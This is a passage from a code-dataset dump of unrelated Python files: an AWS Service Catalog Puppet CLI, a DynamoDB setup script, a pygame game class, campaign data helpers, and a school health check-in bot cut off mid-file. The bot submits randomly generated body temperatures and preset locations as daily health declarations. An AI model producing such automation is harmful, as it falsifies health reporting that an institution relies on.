{}\".format(constants.BOOTSTRAP_STACK_NAME))\n template = asset_helpers.read_from_site_packages(\n \"{}.template.yaml\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n template = Template(template).render(\n VERSION=puppet_version,\n ALL_REGIONS=all_regions,\n Source=source_args,\n is_caching_enabled=config.is_caching_enabled(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n ),\n )\n template = Template(template).render(\n VERSION=puppet_version, ALL_REGIONS=all_regions, Source=source_args\n )\n args = {\n \"StackName\": constants.BOOTSTRAP_STACK_NAME,\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_NAMED_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"OrgIamRoleArn\",\n \"ParameterValue\": str(\n config.get_org_iam_role_arn(puppet_account_id)\n ),\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"WithManualApprovals\",\n \"ParameterValue\": \"Yes\" if with_manual_approvals else \"No\",\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetCodePipelineRolePermissionBoundary\",\n \"ParameterValue\": puppet_code_pipeline_role_permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"SourceRolePermissionsBoundary\",\n \"ParameterValue\": source_role_permissions_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetGenerateRolePermissionBoundary\",\n \"ParameterValue\": puppet_generate_role_permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetDeployRolePermissionBoundary\",\n \"ParameterValue\": puppet_deploy_role_permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetProvisioningRolePermissionsBoundary\",\n \"ParameterValue\": puppet_provisioning_role_permissions_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"CloudFormationDeployRolePermissionsBoundary\",\n \"ParameterValue\": cloud_formation_deploy_role_permissions_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"DeployEnvironmentComputeType\",\n \"ParameterValue\": deploy_environment_compute_type,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"DeployNumWorkers\",\n \"ParameterValue\": str(deploy_num_workers),\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRoleName\",\n \"ParameterValue\": puppet_role_name,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRolePath\",\n \"ParameterValue\": puppet_role_path,\n \"UsePreviousValue\": False,\n },\n ],\n }\n cloudformation.create_or_update(**args)\n\n click.echo(\"Finished creating {}.\".format(constants.BOOTSTRAP_STACK_NAME))\n if source_provider == \"CodeCommit\":\n with betterboto_client.ClientContextManager(\"codecommit\") as codecommit:\n response = codecommit.get_repository(repositoryName=repo)\n clone_url = response.get(\"repositoryMetadata\").get(\"cloneUrlHttp\")\n clone_command = (\n \"git clone --config 'credential.helper=!aws codecommit credential-helper $@' \"\n \"--config 'credential.UseHttpPath=true' {}\".format(clone_url)\n )\n click.echo(\n \"You need to clone your newly created repo now and will then need to seed it: \\n{}\".format(\n clone_command\n )\n )\n\n\ndef bootstrap_spoke(\n puppet_account_id, permission_boundary, puppet_role_name, puppet_role_path\n):\n with betterboto_client.ClientContextManager(\"cloudformation\") as cloudformation:\n _do_bootstrap_spoke(\n puppet_account_id,\n cloudformation,\n config.get_puppet_version(),\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef bootstrap_branch(\n branch_to_bootstrap,\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n):\n _do_bootstrap(\n \"https://github.com/awslabs/aws-service-catalog-puppet/archive/{}.zip\".format(\n branch_to_bootstrap\n ),\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n constants.DEPLOY_ENVIRONMENT_COMPUTE_TYPE_DEFAULT,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef bootstrap(\n with_manual_approvals,\n puppet_account_id,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_environment_compute_type,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n):\n _do_bootstrap(\n config.get_puppet_version(),\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_environment_compute_type,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef seed(complexity, p):\n example = \"manifest-{}.yaml\".format(complexity)\n shutil.copy2(\n asset_helpers.resolve_from_site_packages(\n os.path.sep.join([\"manifests\", example])\n ),\n os.path.sep.join([p, \"manifest.yaml\"]),\n )\n\n\ndef expand(f, single_account):\n click.echo(\"Expanding\")\n puppet_account_id = config.get_puppet_account_id()\n manifest = manifest_utils.load(f, puppet_account_id)\n org_iam_role_arn = config.get_org_iam_role_arn(puppet_account_id)\n if org_iam_role_arn is None:\n click.echo(\"No org role set - not expanding\")\n new_manifest = manifest\n else:\n click.echo(\"Expanding using role: {}\".format(org_iam_role_arn))\n with betterboto_client.CrossAccountClientContextManager(\n \"organizations\", org_iam_role_arn, \"org-iam-role\"\n ) as client:\n new_manifest = manifest_utils.expand_manifest(manifest, client)\n click.echo(\"Expanded\")\n if single_account:\n click.echo(f\"Filtering for single account: {single_account}\")\n\n for account in new_manifest.get(\"accounts\", []):\n if account.get(\"account_id\") == single_account:\n click.echo(f\"Found single account: {single_account}\")\n new_manifest[\"accounts\"] = [account]\n break\n\n click.echo(\"Filtered\")\n\n new_name = f.name.replace(\".yaml\", \"-expanded.yaml\")\n logger.info(\"Writing new manifest: {}\".format(new_name))\n with open(new_name, \"w\") as output:\n output.write(yaml.safe_dump(new_manifest, default_flow_style=False))\n\n\ndef validate(f):\n logger.info(\"Validating {}\".format(f.name))\n c = Core(\n source_file=f.name,\n schema_files=[asset_helpers.resolve_from_site_packages(\"schema.yaml\")],\n extensions=[\n asset_helpers.resolve_from_site_packages(\"puppet_schema_extensions.py\")\n ],\n )\n c.validate(raise_exception=True)\n click.echo(\"Finished validating: {}\".format(f.name))\n click.echo(\"Finished validating: OK\")\n\n\ndef version():\n click.echo(\n \"cli version: {}\".format(\n pkg_resources.require(\"aws-service-catalog-puppet\")[0].version\n )\n )\n with betterboto_client.ClientContextManager(\"ssm\") as ssm:\n response = ssm.get_parameter(Name=\"service-catalog-puppet-regional-version\")\n click.echo(\n \"regional stack version: {} for region: {}\".format(\n response.get(\"Parameter\").get(\"Value\"),\n response.get(\"Parameter\").get(\"ARN\").split(\":\")[3],\n )\n )\n response = ssm.get_parameter(Name=\"service-catalog-puppet-version\")\n click.echo(\"stack version: {}\".format(response.get(\"Parameter\").get(\"Value\"),))\n\n\ndef upload_config(config):\n with betterboto_client.ClientContextManager(\"ssm\") as ssm:\n ssm.put_parameter(\n Name=constants.CONFIG_PARAM_NAME,\n Type=\"String\",\n Value=yaml.safe_dump(config),\n Overwrite=True,\n )\n click.echo(\"Uploaded config\")\n\n\ndef set_org_iam_role_arn(org_iam_role_arn):\n with betterboto_client.ClientContextManager(\"ssm\") as ssm:\n ssm.put_parameter(\n Name=constants.CONFIG_PARAM_NAME_ORG_IAM_ROLE_ARN,\n Type=\"String\",\n Value=org_iam_role_arn,\n Overwrite=True,\n )\n click.echo(\"Uploaded config\")\n\n\ndef bootstrap_org_master(puppet_account_id):\n with betterboto_client.ClientContextManager(\"cloudformation\",) as cloudformation:\n org_iam_role_arn = None\n puppet_version = config.get_puppet_version()\n logger.info(\"Starting bootstrap of org master\")\n stack_name = f\"{constants.BOOTSTRAP_STACK_NAME}-org-master-{puppet_account_id}\"\n template = asset_helpers.read_from_site_packages(\n f\"{constants.BOOTSTRAP_STACK_NAME}-org-master.template.yaml\"\n )\n template = Template(template).render(\n VERSION=puppet_version, puppet_account_id=puppet_account_id\n )\n args = {\n \"StackName\": stack_name,\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_NAMED_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"PuppetAccountId\",\n \"ParameterValue\": str(puppet_account_id),\n },\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n ],\n \"Tags\": [{\"Key\": \"ServiceCatalogPuppet:Actor\", \"Value\": \"Framework\",}],\n }\n cloudformation.create_or_update(**args)\n response = cloudformation.describe_stacks(StackName=stack_name)\n if len(response.get(\"Stacks\")) != 1:\n raise Exception(\"Expected there to be only one {} stack\".format(stack_name))\n stack = response.get(\"Stacks\")[0]\n\n for output in stack.get(\"Outputs\"):\n if output.get(\"OutputKey\") == constants.PUPPET_ORG_ROLE_FOR_EXPANDS_ARN:\n logger.info(\"Finished bootstrap of org-master\")\n org_iam_role_arn = output.get(\"OutputValue\")\n\n if org_iam_role_arn is None:\n raise Exception(\n \"Could not find output: {} in stack: {}\".format(\n constants.PUPPET_ORG_ROLE_FOR_EXPANDS_ARN, stack_name\n )\n )\n\n click.echo(\"Bootstrapped org master, org-iam-role-arn: {}\".format(org_iam_role_arn))\n\n\ndef run(what, tail):\n pipelines = {\"puppet\": constants.PIPELINE_NAME}\n pipeline_name = pipelines.get(what)\n pipeline_execution_id = aws.run_pipeline(pipeline_name, tail)\n click.echo(\n f\"https://{os.environ.get('AWS_DEFAULT_REGION')}.console.aws.amazon.com/codesuite/codepipeline/pipelines/{pipeline_name}/executions/{pipeline_execution_id}/timeline\"\n )\n\n\ndef list_resources():\n click.echo(\"# Framework resources\")\n\n click.echo(\"## SSM Parameters used\")\n click.echo(f\"- {constants.CONFIG_PARAM_NAME}\")\n click.echo(f\"- {constants.CONFIG_PARAM_NAME_ORG_IAM_ROLE_ARN}\")\n\n for file in Path(__file__).parent.resolve().glob(\"*.template.yaml\"):\n if \"empty.template.yaml\" == file.name:\n continue\n template_contents = Template(open(file, \"r\").read()).render()\n template = cfn_tools.load_yaml(template_contents)\n click.echo(f\"## Resources for stack: {file.name.split('.')[0]}\")\n table_data = [\n [\"Logical Name\", \"Resource Type\", \"Name\",],\n ]\n table = terminaltables.AsciiTable(table_data)\n for logical_name, resource in template.get(\"Resources\").items():\n resource_type = resource.get(\"Type\")\n name = \"-\"\n type_to_name = {\n \"AWS::IAM::Role\": \"RoleName\",\n \"AWS::SSM::Parameter\": \"Name\",\n \"AWS::S3::Bucket\": \"BucketName\",\n \"AWS::CodePipeline::Pipeline\": \"Name\",\n \"AWS::CodeBuild::Project\": \"Name\",\n \"AWS::CodeCommit::Repository\": \"RepositoryName\",\n \"AWS::SNS::Topic\": \"TopicName\",\n \"AWS::SQS::Queue\": \"QueueName\",\n }\n\n if type_to_name.get(resource_type) is not None:\n name = resource.get(\"Properties\", {}).get(\n type_to_name.get(resource_type), \"Not Specified\"\n )\n if not isinstance(name, str):\n name = cfn_tools.dump_yaml(name)\n\n table_data.append([logical_name, resource_type, name])\n\n click.echo(table.table)\n click.echo(f\"n.b. AWS::StackName evaluates to {constants.BOOTSTRAP_STACK_NAME}\")\n\n\ndef import_product_set(f, name, portfolio_name):\n url = f\"https://raw.githubusercontent.com/awslabs/aws-service-catalog-products/master/{name}/manifest.yaml\"\n response = requests.get(url)\n logger.info(f\"Getting {url}\")\n manifest = yaml.safe_load(f.read())\n if manifest.get(\"launches\") is None:\n manifest[\"launches\"] = {}\n manifest_segment = yaml.safe_load(response.text)\n for launch_name, details in manifest_segment.get(\"launches\").items():\n details[\"portfolio\"] = portfolio_name\n manifest[\"launches\"][launch_name] = details\n with open(f.name, \"w\") as f:\n f.write(yaml.safe_dump(manifest))\n\n\ndef get_manifest():\n with betterboto_client.ClientContextManager(\"codecommit\") as codecommit:\n content = codecommit.get_file(\n repositoryName=constants.SERVICE_CATALOG_PUPPET_REPO_NAME,\n filePath=\"manifest.yaml\",\n ).get(\"fileContent\")\n return yaml.safe_load(content)\n\n\ndef save_manifest(manifest):\n with betterboto_client.ClientContextManager(\"codecommit\") as codecommit:\n parent_commit_id = (\n codecommit.get_branch(\n repositoryName=constants.SERVICE_CATALOG_PUPPET_REPO_NAME,\n branchName=\"master\",\n )\n .get(\"branch\")\n .get(\"commitId\")\n )\n codecommit.put_file(\n repositoryName=constants.SERVICE_CATALOG_PUPPET_REPO_NAME,\n branchName=\"master\",\n fileContent=yaml.safe_dump(manifest),\n parentCommitId=parent_commit_id,\n commitMessage=\"Auto generated commit\",\n filePath=f\"manifest.yaml\",\n )\n\n\ndef add_to_accounts(account_or_ou):\n manifest = get_manifest()\n manifest.get(\"accounts\").append(account_or_ou)\n save_manifest(manifest)\n\n\ndef remove_from_accounts(account_id_or_ou_id_or_ou_path):\n manifest = get_manifest()\n for account in manifest.get(\"accounts\", []):\n if account.get(\"account_id\", \"\") == account_id_or_ou_id_or_ou_path:\n manifest.get(\"accounts\").remove(account)\n return save_manifest(manifest)\n elif account.get(\"ou\", \"\") == account_id_or_ou_id_or_ou_path:\n manifest.get(\"accounts\").remove(account)\n return save_manifest(manifest)\n raise Exception(f\"Did not remove {account_id_or_ou_id_or_ou_path}\")\n\n\ndef add_to_launches(launch_name, launch):\n manifest = get_manifest()\n launches = manifest.get(\"launches\", {})\n launches[launch_name] = launch\n manifest[\"launches\"] = launches\n save_manifest(manifest)\n\n\ndef remove_from_launches(launch_name):\n manifest = get_manifest()\n del manifest.get(\"launches\")[launch_name]\n save_manifest(manifest)\n\n\ndef set_config_value(name, value):\n with betterboto_client.ClientContextManager(\n \"ssm\", region_name=constants.HOME_REGION\n ) as ssm:\n try:\n response = ssm.get_parameter(Name=constants.CONFIG_PARAM_NAME)\n config = yaml.safe_load(response.get(\"Parameter\").get(\"Value\"))\n except ssm.exceptions.ParameterNotFound:\n config = {}\n\n if name == \"regions\":\n config[\"regions\"] = value if len(value) > 1 else value[0].split(\",\")\n else:\n config[name] = value.upper() == \"TRUE\"\n\n upload_config(config)\n\n\ndef set_named_config_value(name, value):\n with betterboto_client.ClientContextManager(\n \"ssm\", region_name=constants.HOME_REGION\n ) as ssm:\n ssm.put_parameter(\n Name=name, Type=\"String\", Value=value, Overwrite=True,\n )\n click.echo(\"Uploaded named config\")\n\n\ndef bootstrap_spokes_in_ou(\n ou_path_or_id,\n role_name,\n iam_role_arns,\n permission_boundary,\n num_workers,\n puppet_role_name,\n puppet_role_path,\n):\n puppet_account_id = config.get_puppet_account_id()\n org_iam_role_arn = config.get_org_iam_role_arn(puppet_account_id)\n if org_iam_role_arn is None:\n click.echo(\"No org role set - not expanding\")\n else:\n click.echo(\"Expanding using role: {}\".format(org_iam_role_arn))\n with betterboto_client.CrossAccountClientContextManager(\n \"organizations\", org_iam_role_arn, \"org-iam-role\"\n ) as client:\n tasks = []\n if ou_path_or_id.startswith(\"/\"):\n ou_id = client.convert_path_to_ou(ou_path_or_id)\n else:\n ou_id = ou_path_or_id\n logging.info(f\"ou_id is {ou_id}\")\n response = client.list_children_nested(ParentId=ou_id, ChildType=\"ACCOUNT\")\n for spoke in response:\n tasks.append(\n management_tasks.BootstrapSpokeAsTask(\n puppet_account_id=puppet_account_id,\n account_id=spoke.get(\"Id\"),\n iam_role_arns=iam_role_arns,\n role_name=role_name,\n permission_boundary=permission_boundary,\n puppet_role_name=puppet_role_name,\n puppet_role_path=puppet_role_path,\n )\n )\n\n runner.run_tasks_for_bootstrap_spokes_in_ou(tasks, num_workers)\n\n\ndef handle_action_execution_detail(puppet_account_id, action_execution_detail):\n action_type_id = action_execution_detail.get(\"input\").get(\"actionTypeId\")\n if (\n action_type_id.get(\"category\") == \"Build\"\n and action_type_id.get(\"owner\") == \"AWS\"\n and action_type_id.get(\"provider\") == \"CodeBuild\"\n ):\n external_execution_id = (\n action_execution_detail.get(\"output\")\n .get(\"executionResult\")\n .get(\"externalExecutionId\")\n )\n\n with betterboto_client.ClientContextManager(\n \"codebuild\", region_name=config.get_home_region(puppet_account_id)\n ) as codebuild:\n builds = codebuild.batch_get_builds(ids=[external_execution_id]).get(\n \"builds\"\n )\n build = builds[0]\n log_details = build.get(\"logs\")\n with betterboto_client.ClientContextManager(\n \"logs\", region_name=config.get_home_region(puppet_account_id)\n ) as logs:\n with open(\n f\"log-{action_execution_detail.get('input').get('configuration').get('ProjectName')}.log\",\n \"w\",\n ) as f:\n params = {\n \"logGroupName\": log_details.get(\"groupName\"),\n \"logStreamName\": log_details.get(\"streamName\"),\n \"startFromHead\": True,\n }\n has_more_logs = True\n while has_more_logs:\n get_log_events_response = logs.get_log_events(**params)\n if (len(get_log_events_response.get(\"events\"))) > 0:\n params[\"nextToken\"] = get_log_events_response.get(\n \"nextForwardToken\"\n )\n else:\n has_more_logs = False\n if params.get(\"nextToken\"):\n del params[\"nextToken\"]\n for e in get_log_events_response.get(\"events\"):\n d = datetime.utcfromtimestamp(\n e.get(\"timestamp\") / 1000\n ).strftime(\"%Y-%m-%d %H:%M:%S\")\n f.write(f\"{d} : {e.get('message')}\")\n\n\ndef export_puppet_pipeline_logs(execution_id, puppet_account_id):\n with betterboto_client.ClientContextManager(\n \"codepipeline\", region_name=config.get_home_region(puppet_account_id)\n ) as codepipeline:\n action_execution_details = codepipeline.list_action_executions(\n pipelineName=constants.PIPELINE_NAME,\n filter={\"pipelineExecutionId\": execution_id},\n ).get(\"actionExecutionDetails\")\n\n for action_execution_detail in action_execution_details:\n handle_action_execution_detail(puppet_account_id, action_execution_detail)\n\n\ndef uninstall(puppet_account_id):\n with betterboto_client.ClientContextManager(\n \"cloudformation\", region_name=config.get_home_region(puppet_account_id)\n ) as cloudformation:\n cloudformation.ensure_deleted(StackName=constants.BOOTSTRAP_STACK_NAME)\n\n\ndef release_spoke(puppet_account_id):\n with betterboto_client.ClientContextManager(\n \"cloudformation\", region_name=config.get_home_region(puppet_account_id)\n ) as cloudformation:\n cloudformation.ensure_deleted(\n StackName=f\"{constants.BOOTSTRAP_STACK_NAME}-spoke\"\n )\n\n\ndef wait_for_code_build_in(iam_role_arns):\n cross_accounts = []\n index = 0\n for role in iam_role_arns:\n cross_accounts.append((role, \"waiting-for-code-build-{}\".format(index)))\n index += 1\n\n with betterboto_client.CrossMultipleAccountsClientContextManager(\n \"codebuild\", cross_accounts\n ) as codebuild:\n while True:\n try:\n result = codebuild.list_projects()\n logger.info(f\"Was able to list projects: {result}\")\n break\n except Exception as e:\n logger.error(\"type error: \" + str(e))\n logger.error(traceback.format_exc())\n\n\ndef wait_for_cloudformation_in(iam_role_arns):\n cross_accounts = []\n index = 0\n for role in iam_role_arns:\n cross_accounts.append((role, \"waiting-for-cloudformation-{}\".format(index)))\n index += 1\n\n with betterboto_client.CrossMultipleAccountsClientContextManager(\n \"cloudformation\", cross_accounts\n ) as cloudformation:\n while True:\n try:\n result = cloudformation.list_stacks()\n logger.info(f\"Was able to list stacks: {result}\")\n break\n except Exception as e:\n logger.error(\"type error: \" + str(e))\n logger.error(traceback.format_exc())\n","sub_path":"servicecatalog_puppet/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":36921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"183154528","text":"import boto3\n\ndynamodb = boto3.resource('dynamodb')\n\ntable = dynamodb.create_table(\n\tTableName='Contacts',\n\tKeySchema=[\n\t\t{\n\t\t\t'AttributeName': 'email_address',\n\t\t\t'KeyType': 'HASH' \n\t\t},\n\t\t{\n\t\t\t'AttributeName': 'full_name',\n\t\t\t'KeyType': 'RANGE'\n\t\t}\n\t],\n\tAttributeDefinitions=[\n\t\t{\n\t\t\t'AttributeName': 'email_address',\n\t\t\t'AttributeType': 'S'\n\t\t},\n\t\t{\n\t\t\t'AttributeName': 'full_name',\n\t\t\t'AttributeType': 'S'\n\t\t}\n\t],\n\tProvisionedThroughput={\n\t\t\"ReadCapacityUnits\": 5,\n\t\t\"WriteCapacityUnits\": 5\n\t}\n)\n\n# Wait until the table exists.\ntable.meta.client.get_waiter('table_exists').wait(TableName='Contacts')\nprint(\"Successfully created the table Contacts on\", table.creation_date_time)\n","sub_path":"db/db_scripts/dynamodb/CreateTableContacts.py","file_name":"CreateTableContacts.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"312561129","text":"import os\nimport pygame as pg\nimport random as rand\n\nfrom Rectangle import Rectangle\nimport Var\n\nred_img = pg.image.load(os.path.join('Assets', 'red_rect.png'))\n\nclass Enemy(Rectangle):\n \"\"\" Creates an enemy \"\"\"\n def __init__(self, x, y, width, height, WIN):\n super().__init__(x, y, width, height, WIN)\n self.img = pg.transform.scale(red_img, (self.width, self.height))\n self.speed = 5\n\n def move_enemies(self, enemies):\n \"\"\" Moves the enemy to the left at increasing speeds \"\"\"\n for enemy in enemies:\n enemy.x -= self.speed\n enemy.rect.center = enemy.x + 45, enemy.y + 37\n return enemies\n\n def out_enemy(self, enemies, ge):\n \"\"\" \n Removes the enemy and increases player fitness if the enemy has left the screen\n \"\"\"\n for enemy in enemies:\n if enemy.x + enemy.width < 0:\n self.speed += 0.25\n enemies.remove(enemy)\n self.x, self.y = Var.SCREEN_WIDTH, 400\n for g in ge:\n g.fitness += 0.01\n return ge\n","sub_path":"Enemy.py","file_name":"Enemy.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"432673667","text":"\"\"\"\nMiscellaneous functions for ARNA campaign work (pre/during/after)\n\"\"\"\nimport os\nimport sys\nimport xarray as xr\nimport glob\nimport numpy as np\nimport AC_tools as AC\nimport pandas as pd\nimport datetime as datetime\nimport time\nfrom time import gmtime, strftime\nimport gc\n\n\ndef get_visibility_reports(dts=None, folder='./', debug=False):\n \"\"\"\n Get the visibility reports from SDS-WAS\n \"\"\"\n import wget\n # Which dates to use\n if isinstance(dts, type(None)):\n Tnow = AC.time2datetime([gmtime()])[0]\n # Get the 5-day forecast at noon...\n dt = datetime.datetime(Tnow.year, Tnow.month, Tnow.day,)\n # Use yesterday\n dt = AC.add_days(dt, -1)\n # Use the last 18 days\n dts = [AC.add_days(dt, i*-1) for i in range(0, 5)]\n # URL for SDS-WAS address\n URL_str = 'https://sds-was.aemet.es/archive/images/visibility/'\n URL_str += '{}/{:0>2}/images/{}{:0>2}{:0>2}_visibility.png'\n # For dt in dts\n for dt in dts:\n if debug:\n print(dt)\n URL = URL_str.format(dt.year, dt.month, dt.year, dt.month, dt.day)\n if debug:\n print(URL)\n filename = URL.split('/')[-1]\n if debug:\n print(filename)\n wget.download(URL, folder+filename)\n\n\ndef convert_aircraft_locs2table():\n \"\"\"\n Make a csv file with details on the airports linked to ARNA campaign\n \"\"\"\n locs2use = ['Dakar', 'DSS', 'Sao Vicente Airport', 'VXE',\n 'Praia Airport', 'RAI',\n 'Gran Canaria Airport', 'LPA', 'Lisbon Airport', 'LIS',\n 'Paris (Charles de Gaulle) Airport', 'CDG'\n ]\n # Loop by location\n d = {}\n for loc in locs2use:\n lon, lat, alt = AC.get_loc(loc)\n # Add to dictionary\n d[loc] = {'Longitude': lon, 'Latitude': lat, 'Altitude': alt}\n # Compile to dataframe and then save.\n pd.DataFrame(d).T.round(2).to_csv('ARNA_Airport_locs.csv')\n","sub_path":"arna/campaign_misc.py","file_name":"campaign_misc.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"249133835","text":"# -*- encoding:utf-8 -*-\nimport requests\nimport json\nimport os\nimport utils\nfrom urllib.parse import urlencode\n\n\nclass WoZaiXiaoYuanPuncher:\n def __init__(self):\n # JWSESSION\n self.jwsession = None\n # 打卡时段\n self.seq = None\n # 打卡结果\n self.status_code = 0\n # 登陆接口\n self.loginUrl = \"https://gw.wozaixiaoyuan.com/basicinfo/mobile/login/username\"\n # 请求头\n self.header = {\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Connection\": \"keep-alive\",\n \"User-Agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.13(0x18000d32) NetType/WIFI Language/zh_CN miniProgram\",\n \"Content-Type\": \"application/json;charset=UTF-8\",\n \"Content-Length\": \"2\",\n \"Host\": \"gw.wozaixiaoyuan.com\",\n \"Accept-Language\": \"en-us,en\",\n \"Accept\": \"application/json, text/plain, */*\"\n }\n # 请求体(必须有)\n self.body = \"{}\"\n\n # 登录\n def login(self):\n username, password = str(os.environ['WZXY_USERNAME']), str(os.environ['WZXY_PASSWORD'])\n url = f'{self.loginUrl}?username={username}&password={password}' \n self.session = requests.session()\n # 登录\n response = self.session.post(url=url, data=self.body, headers=self.header)\n res = json.loads(response.text)\n if res[\"code\"] == 0:\n print(\"使用账号信息登录成功\")\n jwsession = response.headers['JWSESSION']\n self.setJwsession(jwsession)\n return True\n else:\n print(res)\n print(\"登录失败,请检查账号信息\")\n self.status_code = 5\n return False\n\n # 设置JWSESSION\n def setJwsession(self, jwsession):\n # 如果找不到cache,新建cache储存目录与文件\n if not os.path.exists('.cache'): \n print(\"正在创建cache储存目录与文件...\")\n os.mkdir('.cache')\n data = {\"jwsession\":jwsession}\n elif not os.path.exists('.cache/cache.json'):\n print(\"正在创建cache文件...\")\n data = {\"jwsession\":jwsession}\n # 如果找到cache,读取cache并更新jwsession\n else:\n print(\"找到cache文件,正在更新cache中的jwsession...\")\n data = utils.processJson('.cache/cache.json').read()\n data['jwsession'] = jwsession \n utils.processJson(\".cache/cache.json\").write(data)\n self.jwsession = data['jwsession'] \n \n # 获取JWSESSION\n def getJwsession(self):\n if not self.jwsession: # 读取cache中的配置文件\n data = utils.processJson(\".cache/cache.json\").read()\n self.jwsession = data['jwsession'] \n return self.jwsession\n\n # 获取打卡列表,判断当前打卡时间段与打卡情况,符合条件则自动进行打卡\n def PunchIn(self):\n print(\"获取打卡列表中...\")\n url = \"https://student.wozaixiaoyuan.com/heat/getTodayHeatList.json\"\n self.header['Host'] = \"student.wozaixiaoyuan.com\"\n self.header['JWSESSION'] = self.getJwsession()\n self.session = requests.session()\n response = self.session.post(url=url, data=self.body, headers=self.header)\n res = json.loads(response.text)\n # 如果 jwsession 无效,则重新 登录 + 打卡\n if res['code'] == -10:\n print(res)\n print('jwsession 无效,将尝试使用账号信息重新登录')\n self.status_code = 4\n loginStatus = self.login()\n if loginStatus:\n self.PunchIn()\n else:\n print(res)\n print(\"重新登录失败,请检查账号信息\") \n elif res['code'] == 0: \n # 标志时段是否有效\n inSeq = False\n # 遍历每个打卡时段(不同学校的打卡时段数量可能不一样)\n for i in res['data']:\n # 判断时段是否有效\n if int(i['state']) == 1:\n inSeq = True\n # 保存当前学校的打卡时段\n self.seq = int(i['seq'])\n # 判断是否已经打卡\n if int(i['type']) == 0:\n self.doPunchIn(str(i['seq']))\n elif int(i['type']) == 1:\n self.status_code = 2\n print(\"已经打过卡了\")\n # 如果当前时间不在任何一个打卡时段内\n if inSeq == False: \n self.status_code = 3\n print(\"打卡失败:不在打卡时间段内\")\n\n # 执行打卡\n # 参数seq : 当前打卡的序号\n def doPunchIn(self, seq):\n print(\"正在进行:\" + self.getSeq() + \"...\")\n url = \"https://student.wozaixiaoyuan.com/heat/save.json\"\n self.header['Host'] = \"student.wozaixiaoyuan.com\"\n self.header['Content-Type'] = \"application/x-www-form-urlencoded\"\n self.header['JWSESSION'] = self.getJwsession()\n sign_data = {\n \"answers\": '[\"0\"]',\n \"seq\": str(seq),\n \"temperature\": utils.getRandomTemperature(os.environ['WZXY_TEMPERATURE']),\n \"latitude\": os.environ['WZXY_LATITUDE'],\n \"longitude\": os.environ['WZXY_LONGITUDE'],\n \"country\": os.environ['WZXY_COUNTRY'],\n \"city\": os.environ['WZXY_CITY'],\n \"district\": os.environ['WZXY_DISTRICT'],\n \"province\": os.environ['WZXY_PROVINCE'],\n \"township\": os.environ['WZXY_TOWNSHIP'],\n \"street\": os.environ['WZXY_STREET'],\n \"myArea\": \"\",\n \"areacode\": \"\",\n \"userId\": \"\"\n }\n data = urlencode(sign_data)\n self.session = requests.session() \n response = self.session.post(url=url, data=data, headers=self.header)\n response = json.loads(response.text)\n # 打卡情况\n if response[\"code\"] == 0:\n self.status_code = 1\n print(\"打卡成功\")\n else:\n print(response)\n print(\"打卡失败\")\n \n # 